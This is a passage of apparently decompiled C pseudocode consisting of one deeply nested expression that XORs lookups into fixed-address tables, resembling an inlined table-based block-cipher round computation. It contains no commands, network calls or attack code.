0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x18) * 4) ^  *(0x413dc8 + (_t158 & 0x000000ff) * 4) ^ _t242[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + 